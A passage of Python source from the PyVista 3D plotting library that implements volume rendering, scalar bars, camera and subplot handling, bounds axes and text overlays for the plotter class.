idxs0 = scalars < clim[0]
idxs1 = scalars > clim[1]
scalars[idxs0] = clim[0]
scalars[idxs1] = clim[1]
scalars = ((scalars - np.nanmin(scalars)) / (np.nanmax(scalars) - np.nanmin(scalars))) * 255
# scalars = scalars.astype(np.uint8)
volume[title] = scalars
self.mapper.scalar_range = clim
# Set colormap and build lookup table
table = vtk.vtkLookupTable()
# table.SetNanColor(nan_color) # NaN's are chopped out with current implementation
# above/below colors not supported with volume rendering
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
if cmap is None: # Set default map if matplotlib is available
if has_matplotlib:
cmap = rcParams['cmap']
if cmap is not None:
if not has_matplotlib:
cmap = None
raise RuntimeError('Please install matplotlib for volume rendering.')
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
if flip_scalars:
cmap = cmap.reversed()
color_tf = vtk.vtkColorTransferFunction()
for ii in range(n_colors):
color_tf.AddRGBPoint(ii, *cmap(ii)[:-1])
# Set opacities
if isinstance(opacity, (float, int)):
opacity_values = [opacity] * n_colors
elif isinstance(opacity, str):
opacity_values = pyvista.opacity_transfer_function(opacity, n_colors)
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
opacity_values = opacity_transfer_function(opacity, n_colors)
opacity_tf = vtk.vtkPiecewiseFunction()
for ii in range(n_colors):
opacity_tf.AddPoint(ii, opacity_values[ii] / n_colors)
# Now put color tf and opacity tf into a lookup table for the scalar bar
table.SetNumberOfTableValues(n_colors)
lut = cmap(np.array(range(n_colors))) * 255
lut[:,3] = opacity_values
lut = lut.astype(np.uint8)
table.SetTable(VN.numpy_to_vtk(lut))
table.SetRange(*clim)
self.mapper.lookup_table = table
self.mapper.SetInputData(volume)
blending = blending.lower()
if blending in ['additive', 'add', 'sum']:
self.mapper.SetBlendModeToAdditive()
elif blending in ['average', 'avg', 'average_intensity']:
self.mapper.SetBlendModeToAverageIntensity()
elif blending in ['composite', 'comp']:
self.mapper.SetBlendModeToComposite()
elif blending in ['maximum', 'max', 'maximum_intensity']:
self.mapper.SetBlendModeToMaximumIntensity()
elif blending in ['minimum', 'min', 'minimum_intensity']:
self.mapper.SetBlendModeToMinimumIntensity()
else:
raise ValueError('Blending mode \'{}\' invalid. '.format(blending) +
'Please choose one ' + 'of \'additive\', '
'\'composite\', \'minimum\' or ' + '\'maximum\'.')
self.mapper.Update()
self.volume = vtk.vtkVolume()
self.volume.SetMapper(self.mapper)
prop = vtk.vtkVolumeProperty()
prop.SetColor(color_tf)
prop.SetScalarOpacity(opacity_tf)
prop.SetAmbient(ambient)
prop.SetScalarOpacityUnitDistance(opacity_unit_distance)
prop.SetShade(shade)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
self.volume.SetProperty(prop)
actor, prop = self.add_actor(self.volume, reset_camera=reset_camera,
name=name, loc=loc, culling=culling,
pickable=pickable)
# Add scalar bar
if stitle is not None and show_scalar_bar:
self.add_scalar_bar(stitle, **scalar_bar_args)
return actor
def update_scalar_bar_range(self, clim, name=None):
"""Update the value range of the active or named scalar bar.
Parameters
----------
2 item list
The new range of scalar bar. Example: ``[-1, 2]``.
name : str, optional
The title of the scalar bar to update
"""
if isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if len(clim) != 2:
raise TypeError('clim argument must be a length 2 iterable of values: (min, max).')
if name is None:
if not hasattr(self, 'mapper'):
raise RuntimeError('This plotter does not have an active mapper.')
self.mapper.scalar_range = clim
return
# Use the name to find the desired actor
def update_mapper(mapper_helper):
mapper_helper.scalar_range = clim
return
try:
for mh in self._scalar_bar_mappers[name]:
update_mapper(mh)
except KeyError:
raise KeyError('Name ({}) not valid/not found in this plotter.')
return
@property
def camera_set(self):
"""Return if the camera of the active renderer has been set."""
return self.renderer.camera_set
def get_default_cam_pos(self, negative=False):
"""Return the default camera position of the active renderer."""
return self.renderer.get_default_cam_pos(negative=negative)
@camera_set.setter
def camera_set(self, is_set):
"""Set if the camera has been set on the active renderer."""
self.renderer.camera_set = is_set
@property
def renderer(self):
"""Return the active renderer."""
return self.renderers[self._active_renderer_index]
@property
def bounds(self):
"""Return the bounds of the active renderer."""
return self.renderer.bounds
@property
def length(self):
"""Return the length of the diagonal of the bounding box of the scene."""
return pyvista.Box(self.bounds).length
@property
def center(self):
"""Return the center of the active renderer."""
return self.renderer.center
def update_bounds_axes(self):
"""Update the bounds of the active renderer."""
return self.renderer.update_bounds_axes()
@property
def _scalar_bar_slots(self):
"""Return the scalar bar slots of the active renderer."""
return self.renderer._scalar_bar_slots
@property
def _scalar_bar_slot_lookup(self):
"""Return the scalar bar slot lookup of the active renderer."""
return self.renderer._scalar_bar_slot_lookup
@_scalar_bar_slots.setter
def _scalar_bar_slots(self, value):
"""Set the scalar bar slots of the active renderer."""
self.renderer._scalar_bar_slots = value
@_scalar_bar_slot_lookup.setter
def _scalar_bar_slot_lookup(self, value):
"""Set the scalar bar slot lookup of the active renderer."""
self.renderer._scalar_bar_slot_lookup = value
def clear(self):
"""Clear plot by removing all actors and properties."""
for renderer in self.renderers:
renderer.clear()
self._scalar_bar_slots = set(range(MAX_N_COLOR_BARS))
self._scalar_bar_slot_lookup = {}
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
self.mesh = None
def remove_actor(self, actor, reset_camera=False):
"""Remove an actor from the Plotter.
Parameters
----------
actor : vtk.vtkActor
Actor that has previously added to the Renderer.
reset_camera : bool, optional
Resets camera so all actors can be seen.
Returns
-------
success : bool
True when actor removed. False when actor has not been
removed.
"""
for renderer in self.renderers:
renderer.remove_actor(actor, reset_camera)
return True
def add_actor(self, uinput, reset_camera=False, name=None, loc=None,
culling=False, pickable=True):
"""Add an actor to render window.
Creates an actor if input is a mapper.
Parameters
----------
uinput : vtk.vtkMapper or vtk.vtkActor
vtk mapper or vtk actor to be added.
reset_camera : bool, optional
Resets the camera when true.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Default False.
Returns
-------
actor : vtk.vtkActor
The actor.
actor_properties : vtk.Properties
Actor properties.
"""
# add actor to the correct render window
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
return renderer.add_actor(uinput=uinput, reset_camera=reset_camera,
name=name, culling=culling, pickable=pickable)
def loc_to_index(self, loc):
"""Return index of the render window given a location index.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``.
Return
------
idx : int
Index of the render window.
"""
if loc is None:
return self._active_renderer_index
elif isinstance(loc, int):
return loc
elif isinstance(loc, collections.Iterable):
if not len(loc) == 2:
raise AssertionError('"loc" must contain two items')
index_row = loc[0]
index_column = loc[1]
if index_row < 0 or index_row >= self.shape[0]:
raise IndexError('Row index is out of range ({})'.format(self.shape[0]))
if index_column < 0 or index_column >= self.shape[1]:
raise IndexError('Column index is out of range ({})'.format(self.shape[1]))
sz = int(self.shape[0] * self.shape[1])
idxs = np.array([i for i in range(sz)], dtype=int).reshape(self.shape)
return idxs[index_row, index_column]
def index_to_loc(self, index):
"""Convert a 1D index location to the 2D location on the plotting grid."""
if len(self.shape) == 1:
return index
sz = int(self.shape[0] * self.shape[1])
idxs = np.array([i for i in range(sz)], dtype=int).reshape(self.shape)
args = np.argwhere(idxs == index)
if len(args) < 1:
raise RuntimeError('Index ({}) is out of range.')
return args[0]
@property
def camera(self):
"""Return the active camera of the active renderer."""
return self.renderer.camera
@camera.setter
def camera(self, camera):
"""Set the active camera for the rendering scene."""
self.renderer.camera = camera
def enable_parallel_projection(self):
"""Enable parallel projection.
The camera will have a parallel projection. Parallel projection is
often useful when viewing images or 2D datasets.
"""
return self.renderer.enable_parallel_projection()
def disable_parallel_projection(self):
"""Reset the camera to use perspective projection."""
return self.renderer.disable_parallel_projection()
def add_axes_at_origin(self, x_color=None, y_color=None, z_color=None,
xlabel='X', ylabel='Y', zlabel='Z', line_width=2,
labels_off=False, loc=None):
"""Add axes actor at the origin of a render window.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. When None, defaults to the
active render window.
Return
------
marker_actor : vtk.vtkAxesActor
vtkAxesActor actor
"""
kwargs = locals()
_ = kwargs.pop('self')
_ = kwargs.pop('loc')
self._active_renderer_index = self.loc_to_index(loc)
return self.renderers[self._active_renderer_index].add_axes_at_origin(**kwargs)
def show_bounds(self, mesh=None, bounds=None, show_xaxis=True,
show_yaxis=True, show_zaxis=True, show_xlabels=True,
show_ylabels=True, show_zlabels=True, italic=False,
bold=True, shadow=False, font_size=None,
font_family=None, color=None,
xlabel='X Axis', ylabel='Y Axis', zlabel='Z Axis',
use_2d=False, grid=None, location='closest', ticks=None,
all_edges=False, corner_factor=0.5, fmt=None,
minor_ticks=False, loc=None, padding=0.0):
"""Add bounds axes.
Shows the bounds of the most recent input mesh unless mesh is specified.
Parameters
----------
mesh : vtkPolydata or unstructured grid, optional
Input mesh to draw bounds axes around
bounds : list or tuple, optional
Bounds to override mesh bounds.
[xmin, xmax, ymin, ymax, zmin, zmax]
show_xaxis : bool, optional
Makes x axis visible. Default True.
show_yaxis : bool, optional
Makes y axis visible. Default True.
show_zaxis : bool, optional
Makes z axis visible. Default True.
show_xlabels : bool, optional
Shows x labels. Default True.
show_ylabels : bool, optional
Shows y labels. Default True.
show_zlabels : bool, optional
Shows z labels. Default True.
italic : bool, optional
Italicises axis labels and numbers. Default False.
bold : bool, optional
Bolds axis labels and numbers. Default True.
shadow : bool, optional
Adds a black shadow to the text. Default False.
font_size : float, optional
Sets the size of the label font. Defaults to 16.
font_family : string, optional
Font family. Must be either courier, times, or arial.
color : string or 3 item list, optional
Color of all labels and axis titles. Default white.
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
xlabel : string, optional
Title of the x axis. Default "X Axis"
ylabel : string, optional
Title of the y axis. Default "Y Axis"
zlabel : string, optional
Title of the z axis. Default "Z Axis"
use_2d : bool, optional
A bug with vtk 6.3 in Windows seems to cause this function
to crash this can be enabled for smoother plotting for
other environments.
grid : bool or str, optional
Add grid lines to the backface (``True``, ``'back'``, or
``'backface'``) or to the frontface (``'front'``,
``'frontface'``) of the axes actor.
location : str, optional
Set how the axes are drawn: either static (``'all'``),
closest triad (``front``), furthest triad (``'back'``),
static closest to the origin (``'origin'``), or outer
edges (``'outer'``) in relation to the camera
position. Options include: ``'all', 'front', 'back',
'origin', 'outer'``
ticks : str, optional
Set how the ticks are drawn on the axes grid. Options include:
``'inside', 'outside', 'both'``
all_edges : bool, optional
Adds an unlabeled and unticked box at the boundaries of
plot. Useful for when wanting to plot outer grids while
still retaining all edges of the boundary.
corner_factor : float, optional
If ``all_edges````, this is the factor along each axis to
draw the default box. Dafuault is 0.5 to show the full box.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
padding : float, optional
An optional percent padding along each axial direction to cushion
the datasets in the scene from the axes annotations. Defaults to
have no padding
Return
------
cube_axes_actor : vtk.vtkCubeAxesActor
Bounds actor
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = pyvista.Sphere()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh)
>>> _ = plotter.show_bounds(grid='front', location='outer', all_edges=True)
>>> plotter.show() # doctest:+SKIP
"""
kwargs = locals()
_ = kwargs.pop('self')
_ = kwargs.pop('loc')
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
renderer.show_bounds(**kwargs)
def add_bounds_axes(self, *args, **kwargs):
"""Add bounds axes.
DEPRECATED: Please use ``show_bounds`` or ``show_grid``.
"""
logging.warning('`add_bounds_axes` is deprecated. Use `show_bounds` or `show_grid`.')
return self.show_bounds(*args, **kwargs)
def add_bounding_box(self, color=None, corner_factor=0.5, line_width=None,
opacity=1.0, render_lines_as_tubes=False,
lighting=None, reset_camera=None, outline=True,
culling='front', loc=None):
"""Add an unlabeled and unticked box at the boundaries of the plot.
Useful for when wanting to plot outer grids while still retaining
all edges of the boundary.
Parameters
----------
corner_factor : float, optional
If ``all_edges``, this is the factor along each axis to
draw the default box. Dafuault is 0.5 to show the full
box.
corner_factor : float, optional
This is the factor along each axis to draw the default
box. Dafuault is 0.5 to show the full box.
line_width : float, optional
Thickness of lines.
opacity : float, optional
Opacity of mesh. Should be between 0 and 1. Default 1.0
outline : bool
Default is ``True``. when False, a box with faces is shown with
the specified culling
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. Default is ``'front'`` for bounding box.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
"""
kwargs = locals()
_ = kwargs.pop('self')
_ = kwargs.pop('loc')
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
return renderer.add_bounding_box(**kwargs)
def remove_bounding_box(self, loc=None):
"""Remove bounding box from the active renderer.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
"""
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
renderer.remove_bounding_box()
def remove_bounds_axes(self, loc=None):
"""Remove bounds axes from the active renderer.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
"""
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
renderer.remove_bounds_axes()
def subplot(self, index_row, index_column=None):
"""Set the active subplot.
Parameters
----------
index_row : int
Index of the subplot to activate along the rows.
index_column : int
Index of the subplot to activate along the columns.
"""
if len(self.shape) == 1:
self._active_renderer_index = index_row
return
if index_row < 0 or index_row >= self.shape[0]:
raise IndexError('Row index is out of range ({})'.format(self.shape[0]))
if index_column < 0 or index_column >= self.shape[1]:
raise IndexError('Column index is out of range ({})'.format(self.shape[1]))
self._active_renderer_index = self.loc_to_index((index_row, index_column))
def link_views(self, views=0):
"""Link the views' cameras.
Parameters
----------
views : int | tuple or list
If ``views`` is int, link the views to the given view
index or if ``views`` is a tuple or a list, link the given
views cameras.
"""
if isinstance(views, int):
for renderer in self.renderers:
renderer.camera = self.renderers[views].camera
elif isinstance(views, collections.Iterable):
for view_index in views:
self.renderers[view_index].camera = \
self.renderers[views[0]].camera
else:
raise TypeError('Expected type is int, list or tuple:'
'{} is given'.format(type(views)))
def unlink_views(self, views=None):
"""Unlink the views' cameras.
Parameters
----------
views : None | int | tuple or list
If ``views`` is None unlink all the views, if ``views``
is int unlink the selected view's camera or if ``views``
is a tuple or a list, unlink the given views cameras.
"""
if views is None:
for renderer in self.renderers:
renderer.camera = vtk.vtkCamera()
renderer.reset_camera()
elif isinstance(views, int):
self.renderers[views].camera = vtk.vtkCamera()
self.renderers[views].reset_camera()
elif isinstance(views, collections.Iterable):
for view_index in views:
self.renderers[view_index].camera = vtk.vtkCamera()
self.renderers[view_index].reset_camera()
else:
raise TypeError('Expected type is None, int, list or tuple:'
'{} is given'.format(type(views)))
def show_grid(self, **kwargs):
"""Show gridlines and axes labels.
A wrapped implementation of ``show_bounds`` to change default
behaviour to use gridlines and showing the axes labels on the outer
edges. This is intended to be silimar to ``matplotlib``'s ``grid``
function.
"""
kwargs.setdefault('grid', 'back')
kwargs.setdefault('location', 'outer')
kwargs.setdefault('ticks', 'both')
return self.show_bounds(**kwargs)
def set_scale(self, xscale=None, yscale=None, zscale=None, reset_camera=True):
"""Scale all the datasets in the scene of the active renderer.
Scaling in performed independently on the X, Y and Z axis.
A scale of zero is illegal and will be replaced with one.
Parameters
----------
xscale : float, optional
Scaling of the x axis. Must be greater than zero.
yscale : float, optional
Scaling of the y axis. Must be greater than zero.
zscale : float, optional
Scaling of the z axis. Must be greater than zero.
reset_camera : bool, optional
Resets camera so all actors can be seen.
"""
self.renderer.set_scale(xscale, yscale, zscale, reset_camera)
@property
def scale(self):
"""Return the scaling of the active renderer."""
return self.renderer.scale
def add_scalar_bar(self, title=None, n_labels=5, italic=False,
bold=False, title_font_size=None,
label_font_size=None, color=None,
font_family=None, shadow=False, mapper=None,
width=None, height=None, position_x=None,
position_y=None, vertical=None,
interactive=False, fmt=None, use_opacity=True,
outline=False, nan_annotation=False,
below_label=None, above_label=None,
background_color=None, n_colors=None, fill=False):
"""Create scalar bar using the ranges as set by the last input mesh.
Parameters
----------
title : string, optional
Title of the scalar bar. Default None
n_labels : int, optional
Number of labels to use for the scalar bar.
italic : bool, optional
Italicises title and bar labels. Default False.
bold : bool, optional
Bolds title and bar labels. Default True
title_font_size : float, optional
Sets the size of the title font. Defaults to None and is sized
automatically.
label_font_size : float, optional
Sets the size of the title font. Defaults to None and is sized
automatically.
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
width : float, optional
The percentage (0 to 1) width of the window for the colorbar
height : float, optional
The percentage (0 to 1) height of the window for the colorbar
position_x : float, optional
The percentage (0 to 1) along the windows's horizontal
direction to place the bottom left corner of the colorbar
position_y : float, optional
The percentage (0 to 1) along the windows's vertical
direction to place the bottom left corner of the colorbar
interactive : bool, optional
Use a widget to control the size and location of the scalar bar.
use_opacity : bool, optional
Optionally display the opacity mapping on the scalar bar
outline : bool, optional
Optionally outline the scalar bar to make opacity mappings more
obvious.
nan_annotation : bool, optional
Annotate the NaN color
below_label : str, optional
String annotation for values below the scalars range
above_label : str, optional
String annotation for values above the scalars range
background_color : array, optional
The color used for the background in RGB format.
n_colors : int, optional
The maximum number of color displayed in the scalar bar.
fill : bool
Draw a filled box behind the scalar bar with the ``background_color``
Notes
-----
Setting title_font_size, or label_font_size disables automatic font
sizing for both the title and label.
"""
if font_family is None:
font_family = rcParams['font']['family']
if label_font_size is None:
label_font_size = rcParams['font']['label_size']
if title_font_size is None:
title_font_size = rcParams['font']['title_size']
if color is None:
color = rcParams['font']['color']
if fmt is None:
fmt = rcParams['font']['fmt']
if vertical is None:
if rcParams['colorbar_orientation'].lower() == 'vertical':
vertical = True
# Automatically choose size if not specified
if width is None:
if vertical:
width = rcParams['colorbar_vertical']['width']
else:
width = rcParams['colorbar_horizontal']['width']
if height is None:
if vertical:
height = rcParams['colorbar_vertical']['height']
else:
height = rcParams['colorbar_horizontal']['height']
# check if maper exists
if mapper is None:
if not hasattr(self, 'mapper') or self.mapper is None:
raise Exception('Mapper does not exist. '
'Add a mesh with scalars first.')
mapper = self.mapper
if title:
# Check that this data hasn't already been plotted
if title in list(self._scalar_bar_ranges.keys()):
clim = list(self._scalar_bar_ranges[title])
newrng = mapper.scalar_range
oldmappers = self._scalar_bar_mappers[title]
# get max for range and reset everything
if newrng[0] < clim[0]:
clim[0] = newrng[0]
if newrng[1] > clim[1]:
clim[1] = newrng[1]
for mh in oldmappers:
mh.scalar_range = clim[0], clim[1]
mapper.scalar_range = clim[0], clim[1]
self._scalar_bar_mappers[title].append(mapper)
self._scalar_bar_ranges[title] = clim
# Color bar already present and ready to be used so returning
return
# Automatically choose location if not specified
if position_x is None or position_y is None:
try:
slot = min(self._scalar_bar_slots)
self._scalar_bar_slots.remove(slot)
self._scalar_bar_slot_lookup[title] = slot
except:
raise RuntimeError('Maximum number of color bars reached.')
if position_x is None:
if vertical:
position_x = rcParams['colorbar_vertical']['position_x']
position_x -= slot * (width + 0.2 * width)
else:
position_x = rcParams['colorbar_horizontal']['position_x']
if position_y is None:
if vertical:
position_y = rcParams['colorbar_vertical']['position_y']
else:
position_y = rcParams['colorbar_horizontal']['position_y']
position_y += slot * height
# Adjust to make sure on the screen
if position_x + width > 1:
position_x -= width
if position_y + height > 1:
position_y -= height
# parse color
color = parse_color(color)
# Create scalar bar
self.scalar_bar = vtk.vtkScalarBarActor()
if background_color is not None:
background_color = parse_color(background_color, opacity=1.0)
background_color = np.array(background_color) * 255
self.scalar_bar.GetBackgroundProperty().SetColor(background_color[0:3])
if fill:
self.scalar_bar.DrawBackgroundOn()
lut = vtk.vtkLookupTable()
lut.DeepCopy(mapper.lookup_table)
ctable = vtk_to_numpy(lut.GetTable())
alphas = ctable[:, -1][:, np.newaxis] / 255.
use_table = ctable.copy()
use_table[:, -1] = 255.
ctable = (use_table * alphas) + background_color * (1 - alphas)
lut.SetTable(numpy_to_vtk(ctable, array_type=vtk.VTK_UNSIGNED_CHAR))
else:
lut = mapper.lookup_table
self.scalar_bar.SetLookupTable(lut)
if n_colors is not None:
self.scalar_bar.SetMaximumNumberOfColors(n_colors)
if n_labels < 1:
self.scalar_bar.DrawTickLabelsOff()
else:
self.scalar_bar.DrawTickLabelsOn()
self.scalar_bar.SetNumberOfLabels(n_labels)
if nan_annotation:
self.scalar_bar.DrawNanAnnotationOn()
if above_label:
self.scalar_bar.DrawAboveRangeSwatchOn()
self.scalar_bar.SetAboveRangeAnnotation(above_label)
if below_label:
self.scalar_bar.DrawBelowRangeSwatchOn()
self.scalar_bar.SetBelowRangeAnnotation(below_label)
# edit the size of the colorbar
self.scalar_bar.SetHeight(height)
self.scalar_bar.SetWidth(width)
self.scalar_bar.SetPosition(position_x, position_y)
if fmt is not None:
self.scalar_bar.SetLabelFormat(fmt)
if vertical:
self.scalar_bar.SetOrientationToVertical()
else:
self.scalar_bar.SetOrientationToHorizontal()
if label_font_size is None or title_font_size is None:
self.scalar_bar.UnconstrainedFontSizeOn()
self.scalar_bar.AnnotationTextScalingOn()
label_text = self.scalar_bar.GetLabelTextProperty()
anno_text = self.scalar_bar.GetAnnotationTextProperty()
label_text.SetColor(color)
anno_text.SetColor(color)
label_text.SetShadow(shadow)
anno_text.SetShadow(shadow)
# Set font
label_text.SetFontFamily(parse_font_family(font_family))
anno_text.SetFontFamily(parse_font_family(font_family))
label_text.SetItalic(italic)
anno_text.SetItalic(italic)
label_text.SetBold(bold)
anno_text.SetBold(bold)
if label_font_size:
label_text.SetFontSize(label_font_size)
anno_text.SetFontSize(label_font_size)
# Set properties
if title:
clim = mapper.scalar_range
self._scalar_bar_ranges[title] = clim
self._scalar_bar_mappers[title] = [mapper]
self.scalar_bar.SetTitle(title)
title_text = self.scalar_bar.GetTitleTextProperty()
title_text.SetJustificationToCentered()
title_text.SetItalic(italic)
title_text.SetBold(bold)
title_text.SetShadow(shadow)
if title_font_size:
title_text.SetFontSize(title_font_size)
# Set font
title_text.SetFontFamily(parse_font_family(font_family))
# set color
title_text.SetColor(color)
self._scalar_bar_actors[title] = self.scalar_bar
if interactive is None:
interactive = rcParams['interactive']
if self.shape != (1, 1):
interactive = False
elif interactive and self.shape != (1, 1):
err_str = 'Interactive scalar bars disabled for multi-renderer plots'
raise Exception(err_str)
if interactive and hasattr(self, 'iren'):
self.scalar_widget = vtk.vtkScalarBarWidget()
self.scalar_widget.SetScalarBarActor(self.scalar_bar)
self.scalar_widget.SetInteractor(self.iren)
self.scalar_widget.SetEnabled(1)
rep = self.scalar_widget.GetRepresentation()
# self.scalar_widget.On()
if vertical is True or vertical is None:
rep.SetOrientation(1) # 0 = Horizontal, 1 = Vertical
else:
rep.SetOrientation(0) # 0 = Horizontal, 1 = Vertical
self._scalar_bar_widgets[title] = self.scalar_widget
if use_opacity:
self.scalar_bar.SetUseOpacity(True)
if outline:
self.scalar_bar.SetDrawFrame(True)
frame_prop = self.scalar_bar.GetFrameProperty()
frame_prop.SetColor(color)
else:
self.scalar_bar.SetDrawFrame(False)
self.add_actor(self.scalar_bar, reset_camera=False, pickable=False)
def update_scalars(self, scalars, mesh=None, render=True):
"""Update scalars of an object in the plotter.
Parameters
----------
scalars : np.ndarray
Scalars to replace existing scalars.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
"""
if mesh is None:
mesh = self.mesh
if isinstance(mesh, (collections.Iterable, pyvista.MultiBlock)):
# Recursive if need to update scalars on many meshes
for m in mesh:
self.update_scalars(scalars, mesh=m, render=False)
if render:
self.ren_win.Render()
return
if isinstance(scalars, str):
# Grab scalars array if name given
scalars = get_array(mesh, scalars)
if scalars is None:
if render:
self.ren_win.Render()
return
if scalars.shape[0] == mesh.GetNumberOfPoints():
data = mesh.GetPointData()
elif scalars.shape[0] == mesh.GetNumberOfCells():
data = mesh.GetCellData()
else:
raise_not_matching(scalars, mesh)
vtk_scalars = data.GetScalars()
if vtk_scalars is None:
raise Exception('No active scalars')
s = convert_array(vtk_scalars)
s[:] = scalars
data.Modified()
try:
# Why are the points updated here? Not all datasets have points
# and only the scalars array is modified by this function...
mesh.GetPoints().Modified()
except:
pass
if render:
self.ren_win.Render()
def update_coordinates(self, points, mesh=None, render=True):
"""Update the points of an object in the plotter.
Parameters
----------
points : np.ndarray
Points to replace existing points.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
"""
if mesh is None:
mesh = self.mesh
mesh.points = points
if render:
self._render()
def close(self):
"""Close the render window."""
# must close out widgets first
super(BasePlotter, self).close()
# Grab screenshots of last render
self.last_image = self.screenshot(None, return_img=True)
self.last_image_depth = self.get_image_depth()
if hasattr(self, 'axes_widget'):
del self.axes_widget
if hasattr(self, 'scalar_widget'):
del self.scalar_widget
# reset scalar bar stuff
self.clear()
if hasattr(self, 'ren_win'):
self.ren_win.Finalize()
del self.ren_win
if hasattr(self, '_style'):
del self._style
if hasattr(self, 'iren'):
self.iren.RemoveAllObservers()
self.iren.TerminateApp()
del self.iren
if hasattr(self, 'textActor'):
del self.textActor
# end movie
if hasattr(self, 'mwriter'):
try:
self.mwriter.close()
except BaseException:
pass
def deep_clean(self):
"""Clean the plotter of the memory."""
for renderer in self.renderers:
renderer.deep_clean()
# Do not remove the renderers on the clean
self.mesh = None
self.mapper = None
def add_text(self, text, position='upper_left', font_size=18, color=None,
font=None, shadow=False, name=None, loc=None, viewport=False):
"""Add text to plot object in the top left corner by default.
Parameters
----------
text : str
The text to add the rendering
position : str, tuple(float)
Position to place the bottom left corner of the text box.
If tuple is used, the position of the text uses the pixel
coordinate system (default). In this case,
it returns a more general `vtkOpenGLTextActor`.
If string name is used, it returns a `vtkCornerAnnotation`
object normally used for fixed labels (like title or xlabel).
Default is to find the top left corner of the rendering window
and place text box up there. Available position: ``'lower_left'``,
``'lower_right'``, ``'upper_left'``, ``'upper_right'``,
``'lower_edge'``, ``'upper_edge'``, ``'right_edge'``, and
``'left_edge'``
font : string, optional
Font name may be courier, times, or arial
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``.
viewport: bool
If True and position is a tuple of float, uses
the normalized viewport coordinate system (values between 0.0
and 1.0 and support for HiDPI).
Return
------
textActor : vtk.vtkTextActor
Text actor added to plot
"""
if font is None:
font = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if color is None:
color = rcParams['font']['color']
if position is None:
# Set the position of the text to the top left corner
window_size = self.window_size
x = (window_size[0] * 0.02) / self.shape[0]
y = (window_size[1] * 0.85) / self.shape[0]
position = [x, y]
corner_mappings = {
'lower_left': vtk.vtkCornerAnnotation.LowerLeft,
'lower_right': vtk.vtkCornerAnnotation.LowerRight,
'upper_left': vtk.vtkCornerAnnotation.UpperLeft,
'upper_right': vtk.vtkCornerAnnotation.UpperRight,
'lower_edge': vtk.vtkCornerAnnotation.LowerEdge,
'upper_edge': vtk.vtkCornerAnnotation.UpperEdge,
'left_edge': vtk.vtkCornerAnnotation.LeftEdge,
'right_edge': vtk.vtkCornerAnnotation.RightEdge,
}
corner_mappings['ll'] = corner_mappings['lower_left']
corner_mappings['lr'] = corner_mappings['lower_right']
corner_mappings['ul'] = corner_mappings['upper_left']
corner_mappings['ur'] = corner_mappings['upper_right']
corner_mappings['top'] = corner_mappings['upper_edge']
corner_mappings['bottom'] = corner_mappings['lower_edge']
corner_mappings['right'] = corner_mappings['right_edge']
corner_mappings['r'] = corner_mappings['right_edge']
corner_mappings['left'] = corner_mappings['left_edge']
corner_mappings['l'] = corner_mappings['left_edge']
if isinstance(position, (int, str, bool)):
if isinstance(position, str):
position = corner_mappings[position]
elif position is True:
position = corner_mappings['upper_left']
self.textActor = vtk.vtkCornerAnnotation()
# This is how you set the font size with this actor
self.textActor.SetLinearFontScaleFactor(font_size // 2)
self.textActor.SetText(position, text)
else:
self.textActor = vtk.vtkTextActor()
self.textActor.SetInput(text)
self.textActor.SetPosition(position)
if viewport:
self.textActor.GetActualPositionCoordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetActualPosition2Coordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetTextProperty().SetFontSize(int(font_size * 2))
self.textActor.GetTextProperty().SetColor(parse_color(color))
self.textActor.GetTextProperty().SetFontFamily(FONT_KEYS[font])
